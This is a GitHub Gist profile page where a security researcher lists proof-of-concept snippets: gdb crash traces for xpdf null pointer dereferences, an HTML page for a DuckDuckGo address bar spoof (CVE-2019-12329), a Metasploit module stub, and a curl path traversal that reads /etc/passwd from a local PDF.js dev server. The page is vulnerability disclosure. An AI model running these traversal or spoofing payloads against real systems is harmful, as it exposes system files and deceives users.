Skip to content

Instantly share code, notes, and snippets.

🍪
Working for free cookies

Dhiraj Mishra RootUp

🍪
Working for free cookies
Block or report user

Report or block RootUp

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@RootUp
RootUp / poc.sh
Created Sep 3, 2019
null pointer dereference - xpdf 3.04
View poc.sh
xpdf v3.04
PoC: https://gofile.io/?c=QEDJrA
$ gdb ./pdfinfo
(gdb) run poc.pdf
Starting program: /home/input0/Downloads/xpdf-3.04/xpdf/pdfinfo poc.pdf
Syntax Error: Couldn't read xref table
Syntax Warning: PDF file is damaged - attempting to reconstruct xref table...
Syntax Error (895): Illegal character <2f> in hex string
Syntax Error (896): Illegal character <50> in hex string
@RootUp
RootUp / poc.sh
Created Aug 31, 2019
null pointer dereference - xpdf 2.x
View poc.sh
xpdf v2.0
PoC: https://gofile.io/?c=grUzbG
$ gdb ./pdfinfo
(gdb) run out/crashes/id:000000,sig:11,src:000000,op:flip1,pos:2971
Starting program: /home/input0/Downloads/xpdf-2.00/xpdf/pdfinfo out/crashes/id:000000,sig:11,src:000000,op:flip1,pos:2971
Error (2978): Dictionary key must be a name object
Error (2980): Dictionary key must be a name object
Error (2982): Dictionary key must be a name object
Error (2989): Dictionary key must be a name object
@RootUp
RootUp / spoof.html
Last active May 28, 2019
DuckDuckGo Address Bar Spoofing - CVE-2019-12329
View spoof.html
<html><body>
<title>DuckDuckGo — Privacy, simplified.</title>
<head><style>
p.b {
font-family: Arial, Helvetica, sans-serif;
}
</style></head><p class="b"><body bgcolor="#5DBCD2">
<h1 style="text-align:center;">We defintiely store your <br> personal information. Ever.</h1>
<p style="text-align:center;">Our privacy policy is simple: we collect and share any of your personal
View MSF_bodycode.rb
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def run
exploit # start http server
end
def setup
@html = %|
JS goes here!
View AppLockMain.xml
<android.support.design.widget.CoordinatorLayout android:orientation="vertical" android:layout_width="fill_parent" android:layout_height="fill_parent" app:layout_behavior="@string/appbar_scrolling_view_behavior"
xmlns:android="http://schemas.android.com/apk/res/android" xmlns:app="http://schemas.android.com/apk/res-auto">
<FrameLayout android:layout_width="fill_parent" android:layout_height="fill_parent">
<LinearLayout android:orientation="vertical" android:background="@color/white" android:layout_width="fill_parent" android:layout_height="fill_parent">
<LinearLayout android:orientation="vertical" android:id="@id/ll_title_lock_setting" android:background="@color/feature_setting_background" android:visibility="gone" android:layout_width="fill_parent" android:layout_height="wrap_content">
<LinearLayout android:orientation="horizontal" android:paddingTop="@dimen/y4" android:layout_width="fill_parent" android:layout_height="wrap_content">
<TextView and
View HttpConnection.cc
# https://github.com/aria2/aria2/blob/37368130ca7de5491a75fd18a20c5c5cc641824a/src/HttpConnection.cc
std::string result;
std::string line;
while (getline(istr, line)) {
if (util::startsWith(line, "Authorization: Basic")) {
result += "Authorization: Basic ********\n";
}
else if (util::startsWith(line, "Proxy-Authorization: Basic")) {
result += "Proxy-Authorization: Basic ********\n";
}
@RootUp
RootUp / Path.js
Created Nov 15, 2018
Mozilla PDF.js
View Path.js
input0@zero:~$ curl --path-as-is -v http://127.0.0.1:8888/../../../../../../etc/passwd
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8888 (#0)
> GET /../../../../../../etc/passwd HTTP/1.1
> Host: 127.0.0.1:8888
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 200 OK
@RootUp
RootUp / gulpfile.js
Created Nov 15, 2018
Mozilla PDF.js
View gulpfile.js
input0@zero:~/Desktop/pdf.js$ gulp server
[11:58:49] Using gulpfile ~/Desktop/pdf.js/gulpfile.js
[11:58:49] Starting 'server'...
### Starting local server
Server running at http://localhost:8888/
@RootUp
RootUp / gulpfile.js
Created Nov 15, 2018
Mozilla PDF.js
View gulpfile.js
gulp.task('baseline', function (done) {
console.log();
console.log('### Creating baseline environment');
var baselineCommit = process.env['BASELINE'];
if (!baselineCommit) {
done(new Error('Missing baseline commit. Specify the BASELINE variable.'));
return;
}
@RootUp
RootUp / MozPDF.js
Created Nov 15, 2018
Mozilla PDF.js
View MozPDF.js
$ git clone https://github.com/mozilla/pdf.js.git
$ cd pdf.js
$ npm install -g gulp-cli
$ npm install
$ gulp server
You can’t perform that action at this time.